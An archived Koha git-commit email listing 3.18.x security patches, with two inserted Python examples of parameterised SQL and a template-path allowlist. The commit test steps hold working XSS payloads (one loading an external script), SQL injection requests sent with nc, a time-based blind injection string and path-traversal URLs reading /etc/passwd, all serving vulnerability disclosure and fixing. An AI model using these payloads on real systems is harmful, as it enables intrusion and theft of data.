[koha-commits] main Koha release repository branch 3.18.x updated. v3.18.07-65-ga55fd07
Git repo owner
gitmaster at git.koha-community.org
Tue Jun 23 10:57:55 CEST 2015
This is an automated email from the git hooks/post-receive script. It was
generated because a ref change was pushed to the repository containing
the project "main Koha release repository".
The branch, 3.18.x has been updated
via a55fd078e907209fb6b588372814909f7e478fab (commit)
via e4ec3edf8a952a371a57e9bd6fb1cb2d7956322d (commit)
via 814f22e7947bc36a28ebf96418bfce6363414677 (commit)
via adc35d736e676746402c5cce5c9c3fe8af68fb01 (commit)
via 3e86cb1711dc4bb95c3f3258621fb5b2552ae771 (commit)
via b847e4e6d111d3e5e6e115d6f6bd290ef124e13b (commit)
via 5de675274633eefed59b95ae3176afcce2c7801d (commit)
via e21bf78b8b073d568998da32acb64cae9d4f4edd (commit)
via 308c4c4d4685e05f6d6e763bfa785d78f230010b (commit)
via eb964ffc9c9974169b4056a8fa937c65a35d8a1d (commit)
via 51cd2262c1548c8adaf213d1160d36dd3c1b1980 (commit)
via 794fb09fac40408e12504fb67337299e0b30abe9 (commit)
via 96047dba2c8f97e5582277b88e047534babe1761 (commit)
via 1cc1a9588a26eca84dd4014fde8454107598eb8e (commit)
via f462209e86e30e8ea23da67fb367c77c6d33be88 (commit)
via 5b03b9716b762a1930aa5d298a163fef7fb76992 (commit)
via 358e8e889d8a02d55210d353cd01bbf35d1ddc15 (commit)
via 611df7517a2f1fa58c6780463ff56253d908a23d (commit)
via 0cba81194f86b1b7fbea9d2ab48fe8c995a3c247 (commit)
via a1e0768ceb728f0019086050837884d29e498dfe (commit)
from bea822e6333ea3c7038b26619a0b75a62d5e6496 (commit)
Those revisions listed above that are new to this repository have
not appeared on any other notification email; so we list those
revisions in full, below.
- Log -----------------------------------------------------------------
commit a55fd078e907209fb6b588372814909f7e478fab
Author: Liz Rea <wizzyrea at gmail.com>
Date: Tue Jun 23 20:27:09 2015 +1200
Revert "Bug 13815 - plack loose CGI qw(-utf8) flag creating incorrect utf-8 encoding everywhere"
This reverts commit af127c124f1575a96cc3efca7eff0ef9135e88e6.
Oops.
commit e4ec3edf8a952a371a57e9bd6fb1cb2d7956322d
Merge: bea822e 814f22e
Author: Liz Rea <wizzyrea at gmail.com>
Date: Tue Jun 23 13:41:22 2015 +1200
Merge branch 'security-3.18.x' into rmaint-3.18.x
commit 814f22e7947bc36a28ebf96418bfce6363414677
Author: Liz Rea <wizzyrea at gmail.com>
Date: Tue Jun 23 13:40:56 2015 +1200
Increment version for 3.18.8 release
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit adc35d736e676746402c5cce5c9c3fe8af68fb01
Author: Liz Rea <wizzyrea at gmail.com>
Date: Tue Jun 23 13:28:38 2015 +1200
Update release notes for 3.18.8 release
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 3e86cb1711dc4bb95c3f3258621fb5b2552ae771
Author: Liz Rea <wizzyrea at gmail.com>
Date: Tue Jun 23 12:37:09 2015 +1200
Bug 14423 - tab characters in auth_subfields_structure
commit b847e4e6d111d3e5e6e115d6f6bd290ef124e13b
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 09:35:07 2015 +0000
Bug 14423 : Multiple XSS bugs in suggestion.pl
To test
1/ Hit a url like http://localhost:8081/cgi-bin/koha/suggestion/suggestion.pl?author=%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&accepteddate_to=
2/ Notice alert box(es)
3/ Apply patch
4/ Reload and notice alert is gone
Repeat for
collection_title
copyrightdate
isbn
manageddate_from
manageddate_to
publishercode
suggesteddate_from
suggesteddate_to
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 5de675274633eefed59b95ae3176afcce2c7801d
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 09:20:51 2015 +0000
Bug 14423 : Multiple XSS vulnerabilities in serials-search
To test
1/ Hit a url like http://localhost:8081/cgi-bin/koha/serials/serials-search.pl?bookseller_filter=%22%22%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&searched=1&title_filter=
2/ Notice alert boxes
3/ Apply patch
4/ Reload, notice fixed
Repeat for
callnumber_filter
EAN_filter
ISSN_filter
publisher_filter
title_filter
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit e21bf78b8b073d568998da32acb64cae9d4f4edd
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 09:01:32 2015 +0000
Bug 14423 : XSS bugs in catalogue search
To test
1/ hit a url like http://localhost:8081/cgi-bin/koha/catalogue/search.pl?limit=%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice alert boxes
3/ Apply patch
4/ Reload url, no alerts
5/ Check search still works
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 308c4c4d4685e05f6d6e763bfa785d78f230010b
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 08:46:40 2015 +0000
Bug 14423 : XSS issues in marc_subfields_structure
1/ Hit a url like http://localhost:8081/cgi-bin/koha/admin/marc_subfields_structure.pl?op=add_form&tagfield=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice all the alert boxes
3/ Apply patch
4/ Reload page, no more alerts
5/ Test functionality still works
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit eb964ffc9c9974169b4056a8fa937c65a35d8a1d
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 08:33:13 2015 +0000
Bug 14423 XSS bug in auth_subfields_structure
1/ Hit a url like http://localhost:8081/cgi-bin/koha/admin/auth_subfields_structure.pl?op=add_form&authtypecode=%27%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&tagfield=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice a ton of alert boxes pop up
3/ Apply patch
4/ Reload url, no longer get any alerts
5/ Test functionality still works
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 51cd2262c1548c8adaf213d1160d36dd3c1b1980
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 08:18:20 2015 +0000
Bug 14423 : XSS bug in lateorders
1/ hit a url like http://localhost:8081/cgi-bin/koha/acqui/lateorders.pl?delay=<script>alert('oh noes')</script>&estimateddeliverydatefrom
2/ Note you get an alert box
3/ Apply patch, notice it is fixed
4/ Test functionality still works
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 794fb09fac40408e12504fb67337299e0b30abe9
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 08:10:20 2015 +0000
Bug 14423 : XSS in authorities-home
To test:
1/ Hit a url like http://localhost:8081/cgi-bin/koha/authorities/authorities-home.pl?op=do_search&type=intranet&marclist=mainentry&and_or=and&operator=contains&value=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice you get 3 alert boxes
3/ Apply patch
4/ Hit the url again, no js
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 96047dba2c8f97e5582277b88e047534babe1761
Author: Jonathan Druart <jonathan.druart at koha-community.org>
Date: Mon Jun 22 10:56:26 2015 +0200
Bug 14426: Escape or use placeholders for sql parameters
Is this patch enough to prevent SQL injection in borrowers_out.pl?
====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002
====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002
====================================================================
Signed-off-by: Chris Cormack <chrisc at catalyst.net.nz>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
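The two Filter payloads above are a boolean-based pair: they should produce the same result if the value is not being spliced into SQL. As an added illustration (not Koha's own code), the Python below models the report pattern they probe, assuming, as the payloads suggest, that Criteria names a column and Filter supplies a value. The interpolated query answers differently for the two Filter payloads, while the hardened version allowlists the column name and binds the value with a placeholder. The table, rows and allowlist are constructed for the example.

```python
import sqlite3

# Columns a report may filter on. Constructed for this example, not Koha's list.
ALLOWED_CRITERIA = {"branchcode", "categorycode"}


def build_conn():
    """In-memory borrowers table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE borrowers (borrowernumber INTEGER, branchcode TEXT, categorycode TEXT)"
    )
    conn.executemany(
        "INSERT INTO borrowers VALUES (?, ?, ?)",
        [(1, "P_COM", "PT"), (2, "P_COM", "ST"), (3, "CPL", "PT")],
    )
    return conn


def count_vulnerable(criteria, filter_value):
    """The pattern the bug describes: both request parameters interpolated into SQL.
    Filter=P_COM' AND 'a'='a closes the quoted literal and appends a condition."""
    conn = build_conn()
    sql = f"SELECT COUNT(*) FROM borrowers WHERE {criteria} = '{filter_value}'"
    return conn.execute(sql).fetchone()[0]


def criteria_allowed(criteria):
    """Column names cannot be bound as placeholders, so they are checked against an allowlist."""
    return criteria in ALLOWED_CRITERIA


def count_hardened(criteria, filter_value):
    """Allowlisted column name plus a bound value: the payload is just a string matching no row."""
    if not criteria_allowed(criteria):
        raise ValueError(f"unsupported criteria: {criteria!r}")
    conn = build_conn()
    sql = f"SELECT COUNT(*) FROM borrowers WHERE {criteria} = ?"
    return conn.execute(sql, (filter_value,)).fetchone()[0]
```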
commit 1cc1a9588a26eca84dd4014fde8454107598eb8e
Author: Chris <chris at bigballofwax.co.nz>
Date: Mon Jun 22 05:23:52 2015 +0000
Bug 14408 Path Traversal error
Counter counter patch
Please test well, including with the null byte %00. This uses a whitelist to only allow files ending with .tt and does not allow ../etc.
Note the previous patch tries to protect against /etc/passwd but //etc/passwd is now vulnerable. I do think a whitelist is safer than trying to do a blacklist.
/cgi-bin/koha/svc/virtualshelves/search
/cgi-bin/koha/svc/members/search
are vulnerable
To test:
1/ Hit /cgi-bin/koha/svc/members/search?template_path=members/tables/members_results.tt
Notice you get a valid JSON response
2/ Hit
/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
(You may have to add more ..%2f or remove them to get the correct path)
Notice you can see the contents of the /etc/passwd file
3/ Hit
/cgi-bin/koha/svc/members/search?template_path=test%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4/ Apply patch
5/ Hit the first url again, notice it still works
6/ Hit the second url notice it now errors with a file not found
7/ Hit the third url notice it now errors with a file not found
Repeat for the other script also
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit f462209e86e30e8ea23da67fb367c77c6d33be88
Author: Liz Rea <wizzyrea at gmail.com>
Date: Tue Jun 23 09:57:18 2015 +1200
Revert "Bug 14408 Path traversal vulnerability"
This reverts commit a1e0768ceb728f0019086050837884d29e498dfe.
commit 5b03b9716b762a1930aa5d298a163fef7fb76992
Author: Chris Cormack <chrisc at catalyst.net.nz>
Date: Fri Jun 19 11:41:45 2015 +1200
Bug 14418 : More XSS vulnerabilities in opac-shelves.pl
To test:
1/ Hit a url like /cgi-bin/koha/opac-shelves.pl?viewshelf=7&op=modif&display="><script>alert('oh noes')</script>
Where the id is a valid shelf id
2/ Notice the js is executed
3/ Apply patch
4/ Reload page
5/ Notice input is now escaped on display
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
Tested in Debian, couldn't reproduce the alert in Iceweasel, but in Chromium. Patch fixes it.
commit 358e8e889d8a02d55210d353cd01bbf35d1ddc15
Author: Chris Cormack <chrisc at catalyst.net.nz>
Date: Fri Jun 19 11:30:22 2015 +1200
Bug 14418 : XSS flaw in opac-shelves.pl
To test:
1/ Create a list and add at least one item to it
2/ Hit a url like http://192.168.2.18/cgi-bin/koha/opac-shelves.pl?viewshelf=7&sort=author&direction=%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
Where the shelf id is the number of the list you created, notice the js is executed
3/ Apply the patch
4/ Reload the page notice the js is now escaped
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
commit 611df7517a2f1fa58c6780463ff56253d908a23d
Author: Chris Cormack <chrisc at catalyst.net.nz>
Date: Fri Jun 19 09:25:22 2015 +1200
Bug 14418 XSS Vulnerabilities
Fix for /cgi-bin/koha/opac-search.pl
To test
1/ Hit /cgi-bin/koha/opac-search.pl?tag="><script src='http://cst.sba-research.org/x.js'/>&q=a
2/ Notice the js is executed
3/ Apply patch
4/ Reload page, notice it is no longer executed
5/ Test the rss links work still
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
Confirmed bug and that the patch fixes it.
commit 0cba81194f86b1b7fbea9d2ab48fe8c995a3c247
Author: Chris Cormack <chrisc at catalyst.net.nz>
Date: Fri Jun 19 08:35:07 2015 +1200
Bug 14412 : SQL injection possible
There is a SQL Injection vulnerability in the
/cgi-bin/koha/opac-tags_subject.pl script.
By manipulating the variable 'number', the database can be accessed
via time-based blind injections.
The following string serves as an example:
/cgi-bin/koha/opac-tags_subject.pl?number=1+PROCEDURE+ANALYSE+(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)
To exploit the vulnerability, no authentication is needed.
To test
1/ Turn on mysql query logging
2/ Hit /cgi-bin/koha/opac-tags_subject.pl?number=1+PROCEDURE+ANALYSE+(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)
3/ Check the logs notice something like
SELECT entry,weight FROM tags ORDER BY weight DESC LIMIT 1 PROCEDURE ANALYSE (EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)
4/ Apply patch
5/ Hit the url again
6/ Notice the log now only has
SELECT entry,weight FROM tags ORDER BY weight DESC LIMIT 1
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
Confirmed the problem and the fix for it.
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit a1e0768ceb728f0019086050837884d29e498dfe
Author: Jonathan Druart <jonathan.druart at koha-community.org>
Date: Fri Jun 19 10:12:45 2015 +0200
Bug 14408 Path traversal vulnerability
/cgi-bin/koha/svc/virtualshelves/search
/cgi-bin/koha/svc/members/search
are vulnerable
To test:
1/ Hit /cgi-bin/koha/svc/members/search?template_path=members/tables/members_results.tt
Notice you get a valid JSON response
2/ Hit
/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
(You may have to add more ..%2f or remove them to get the correct path)
Notice you can see the contents of the /etc/passwd file
3/ Hit
/cgi-bin/koha/svc/members/search?template_path=test%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4/ Apply patch
5/ Hit the first url again, notice it still works
6/ Hit the second url notice it now errors with a file not found
7/ Hit the third url notice it now errors with a file not found
Repeat for the other script also
Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
Signed-off-by: Kyle M Hall <kyle at bywatersolutions.com>
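As an added illustration of the whitelist approach argued for in commit 1cc1a95 (the counter patch for the template_path issue also described in the reverted a1e0768 above), and not Koha's own code: a Python validator that accepts only a relative path of plain segments ending in .tt under an assumed template root, so the ../, test/../ and //etc/passwd forms from the test steps and a %00 null byte are all rejected. The template root and the sample request values are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

# Assumed template root for this example; Koha's real layout may differ.
TEMPLATE_ROOT = "/usr/share/koha/intranet-tmpl/prog/en/modules"

# Constructed request values, encoded as they would appear in the query string.
SAMPLE_REQUESTS = [
    "members/tables/members_results.tt",
    "..%2f..%2f..%2f..%2fetc%2fpasswd",
    "test%2f..%2f..%2f..%2fetc%2fpasswd",
    "%2f%2fetc%2fpasswd",
    "members%2ftables%2fmembers_results.tt%00",
]


def safe_template_path(template_path, root=TEMPLATE_ROOT):
    """Allowlist check on an already URL-decoded template_path value.

    Returns the absolute file under root, or None when the value is anything
    other than a relative path of plain segments ending in .tt."""
    if "\x00" in template_path:          # a null byte would truncate the name in a C-level open()
        return None
    if template_path.startswith("/"):    # rejects /etc/passwd and //etc/passwd alike
        return None
    if not template_path.endswith(".tt"):
        return None
    segments = template_path.split("/")
    if any(seg in ("", ".", "..") for seg in segments):   # no empty, '.' or '..' segments
        return None
    full = posixpath.normpath(posixpath.join(root, template_path))
    if not full.startswith(root + "/"):  # defence in depth; cannot fail after the checks above
        return None
    return full


def check_requests(requests=SAMPLE_REQUESTS):
    """Decode each raw query value the way the CGI layer does, then validate it."""
    return {raw: safe_template_path(unquote(raw)) for raw in requests}
```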
-----------------------------------------------------------------------
Summary of changes:
C4/Auth.pm | 3 +
C4/Koha.pm | 2 +-
installer/data/mysql/updatedatabase.pl | 7 +-
.../prog/en/includes/authorities-search.inc | 6 +-
.../prog/en/modules/acqui/lateorders.tt | 6 +-
.../en/modules/admin/auth_subfields_structure.tt | 28 +--
.../en/modules/admin/marc_subfields_structure.tt | 28 +--
.../prog/en/modules/catalogue/results.tt | 6 +-
.../prog/en/modules/serials/serials-search.tt | 26 +-
.../prog/en/modules/suggestion/suggestion.tt | 22 +-
.../opac-tmpl/bootstrap/en/modules/opac-results.tt | 4 +-
.../opac-tmpl/bootstrap/en/modules/opac-shelves.tt | 4 +-
kohaversion.pl | 2 +-
misc/plack/koha.psgi | 12 -
...e_notes_3_18_2.txt => release_notes_3_18_8.txt} | 250 ++++++++++----------
opac/opac-tags_subject.pl | 4 +-
reports/borrowers_out.pl | 41 ++--
17 files changed, 228 insertions(+), 223 deletions(-)
copy misc/release_notes/{release_notes_3_18_2.txt => release_notes_3_18_8.txt} (51%)
hooks/post-receive
--
main Koha release repository